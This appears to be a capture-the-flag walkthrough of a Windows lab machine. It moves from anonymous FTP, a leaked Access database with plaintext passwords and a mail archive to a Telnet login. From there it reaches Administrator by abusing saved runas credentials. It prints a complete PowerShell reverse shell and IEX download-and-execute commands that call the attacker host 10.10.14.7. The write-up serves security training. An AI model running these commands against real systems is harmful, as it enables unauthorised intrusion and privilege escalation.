Enumeration
Nmap
The Nmap scan indicates that anonymous FTP, Telnet, and a web server running IIS 7.5 are accessible. This IIS release comes bundled with Windows Server 2008 R2. A quick look at the website shows a still image taken from a data centre video feed.
ports=$(nmap -p- --min-rate=1000 -T4 10.129.235.125 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.235.125 -oN nmap_tcp -vPORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHTTP
FTP
On reviewing the FTP server, two files were found: backup.mdb and Access Contro.zip. As both are binary files, the FTP transfer mode was set to binary. After resetting the machine, the IP address has since changed.
└──╼ [★]$ ftp 10.129.235.126
Connected to 10.129.235.126.
220 Microsoft FTP Service
Name (10.129.235.126:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
425 Cannot open data connection.
200 PORT command successful.
150 Opening ASCII mode data connection.
08-23-18 09:16PM <DIR> Backups
08-24-18 10:00PM <DIR> Engineer
226 Transfer complete.
ftp> cd Backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> type binary
200 Type set to I.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************************************************| 5520 KiB 423.49 KiB/s 00:00 ETA
226 Transfer complete.
5652480 bytes received in 00:13 (423.48 KiB/s)
ftp> cd ..
250 CWD command successful.
ftp> cd Engineer
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
08-24-18 01:16AM 10870 Access Control.zip
226 Transfer complete.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************************************************| 10870 14.15 KiB/s 00:00 ETA
226 Transfer complete.
10870 bytes received in 00:00 (14.14 KiB/s)
ftp> exit
221 Goodbye.Inspecting Interesting Files
mdb-tools
Running the file command on backup.mdb confirms that it is a Microsoft Access database. This can be analysed with the mdb-tools suite.
└──╼ [★]$ file backup.mdb
backup.mdb: Microsoft Access DatabaseThe database tables are listed using mdb-tables, with grep colour output applied to highlight the tables of interest.
└──╼ [★]$ mdb-tables backup.mdb | grep --color=auto user
<SNIP auth_user auth_user_groups auth_user_user_permissions <SNIP>An auth_user table is present, which appears to be a database backup from a ZKAccess installation. ZKAccess is an access control application used to manage card readers and the physical security of a site. Data from this table is extracted with mdb-export, revealing usernames along with plaintext passwords.
└──╼ [★]$ mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access<SNIP>",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,7z
Using the unzip command to extract the zip file fails, as it was compressed with an unsupported format. The file is then inspected with 7z, which reveals it is encrypted with the AES-256 algorithm. This encryption method is compatible with both 7z and WinZip.
└──╼ [★]$ unzip "Access Control.zip"
Archive: Access Control.zip
skipping: Access Control.pst unsupported compression method 99└──╼ [★]$ 7z l -slt "Access Control.zip"
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs DO-Regular (406F1),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Listing archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
----------
Path = Access Control.pst
Folder = -
Size = 271360
Packed Size = 10678
Modified = 2018-08-23 19:13:52
Created = 2018-08-23 18:44:57
Accessed = 2018-08-23 18:44:57
Attributes = A
Encrypted = +
Comment =
CRC = 1D60603C
Method = AES-256 Deflate
Host OS = FAT
Version = 20
Volume Index = 0The zip file is successfully extracted using the password obtained earlier.
└──╼ [★]$ 7z x "Access Control.zip"
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs DO-Regular (406F1),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
Enter password (will not be echoed):
Everything is Ok
Size: 271360
Compressed: 10870Foothold
The extraction reveals a file named Access Contro.pst, which is a Microsoft Outlook Personal Folder file used to store emails and related items. This can be examined further with the readpst utility. The tool can be installed by running:
sudo apt install pst-utils└──╼ [★]$ readpst -tea -m "Access Control.pst"
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.We install thunderbird and open the eml file with thunderbird.
sudo apt install thunderbird
The email contains the password for the security account. Using these credentials, a Telnet session can be established, allowing access to retrieve the user flag.
└──╼ [★]$ telnet 10.129.235.126
Trying 10.129.235.126...
Connected to 10.129.235.126.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\security
08/23/2018 11:52 PM <DIR> .
08/23/2018 11:52 PM <DIR> ..
08/24/2018 08:37 PM <DIR> .yawcam
08/21/2018 11:35 PM <DIR> Contacts
08/28/2018 07:51 AM <DIR> Desktop
08/21/2018 11:35 PM <DIR> Documents
08/21/2018 11:35 PM <DIR> Downloads
08/21/2018 11:35 PM <DIR> Favorites
08/21/2018 11:35 PM <DIR> Links
08/21/2018 11:35 PM <DIR> Music
08/21/2018 11:35 PM <DIR> Pictures
08/21/2018 11:35 PM <DIR> Saved Games
08/21/2018 11:35 PM <DIR> Searches
08/24/2018 08:39 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 3,340,615,680 bytes free
C:\Users\security>cd Desktop
C:\Users\security\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\security\Desktop
08/28/2018 07:51 AM <DIR> .
08/28/2018 07:51 AM <DIR> ..
09/08/2025 05:35 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,340,615,680 bytes free
C:\Users\security\Desktop>type user.txt
830b<SNIP>12b5Post-Exploitation
Upgrade from telnet shell
The Telnet shell is limited and not very practical. To obtain a more stable shell, a Python web server is started to host shell.ps1.
sudo python3 -m http.server 8000Use the PowerShell reverse shell one-liner and save it as shell.ps1.
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.7',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()Start a netcat listener on port 443.
sudo nc -nvlp 443The START command is employed to prevent the current Telnet session from becoming locked. The /B parameter ensures that no new window is created, allowing the incoming shell to use the full width of the screen rather than being restricted by the Telnet session’s display width. The IEX command (an alias for Invoke-Expression) executes the downloaded content directly in memory.
C:\Users\security>START /B "" powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.7:8000/shell.ps1')After running the command, we catch a reverse shell:
└──╼ [★]$ sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.129.235.126] 49160
PS C:\Users\security> Saved Credentials
Running cmdkey /list shows that stored credentials exist for the Administrator account.
PS C:\Users\security> cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\AdministratorWindows can store credentials for various reasons. One common case is when a system administrator sets up an application to run with the /savecred option. This stores credentials so that the user does not need to repeatedly enter the administrator password. However, Windows does not limit the use of runas /savecred to a single application. Once enabled, it can be used to run any command with elevated privileges.
Administrators may use this approach to save time, bypass application whitelisting, or grant write access to protected directories. Typically, runas /savecred is configured within a shortcut (.lnk file). The following commands enumerate all shortcut files on the system and check them for the use of runas.
Get-ChildItem "C:\" *.lnk -Recurse -Force | ft fullname | Out-File shortcuts.txt
ForEach($file in gc .\shortcuts.txt) { Write-Output $file; gc $file | Select-String runas }It seems that the ZKAccess shortcut on the Public Desktop has been configured in this way.
<SNIP>
C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk
L?F?@ ??7???7???#?P/P?O? ?:i?+00?/C:\R1M?:Windows???:?�M?:*wW
indowsV1MV?System32???:?�MV?*?System32X2P?:?
runas.exe???:1??:1?*Yrunas.exe
L-K??E?C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess
3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3
.5\img\AccessNET.ico?%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico
<SNIP>
When reviewing the Public user profile, the Desktop folder is not immediately visible because it is hidden. However, it can still be accessed by browsing into the folder and listing its contents. The folder is available to the built-in NT AUTHORITY\INTERACTIVE group. Any user who logs in interactively, either locally or through Remote Desktop or Telnet, will have the Interactive SID in their access token.
PS C:\Users\security> ls C:\Users\Public
Directory: C:\Users\Public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r-- 7/14/2009 6:06 AM Documents
d-r-- 7/14/2009 5:57 AM Downloads
d-r-- 7/14/2009 5:57 AM Music
d-r-- 7/14/2009 5:57 AM Pictures
d-r-- 7/14/2009 5:57 AM Videos
PS C:\Users\security> icacls C:\Users\Public\Desktop
C:\Users\Public\Desktop BUILTIN\Administrators:(OI)(CI)(F)
NT AUTHORITY\INTERACTIVE:(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
ACCESS\Administrator:(OI)(CI)(IO)(DE,DC)
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\security> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ========================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
ACCESS\TelnetClients Alias S-1-5-21-953262931-566350628-63446256-1000 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group
Privilege Escalation
Exploiting runas /savecred
The following command is used to launch a PowerShell reverse shell as ACCESS\Administrator. The root flag is then retrieved from the Administrator’s Desktop.
C:\Users\security>runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.7:8000/shell.ps1')"└──╼ [★]$ sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.129.235.126] 49167
PS C:\Windows\system32> whoami
access\administrator
PS C:\Users\Administrator\Desktop> cat root.txt
23e9<SNIP>ca7b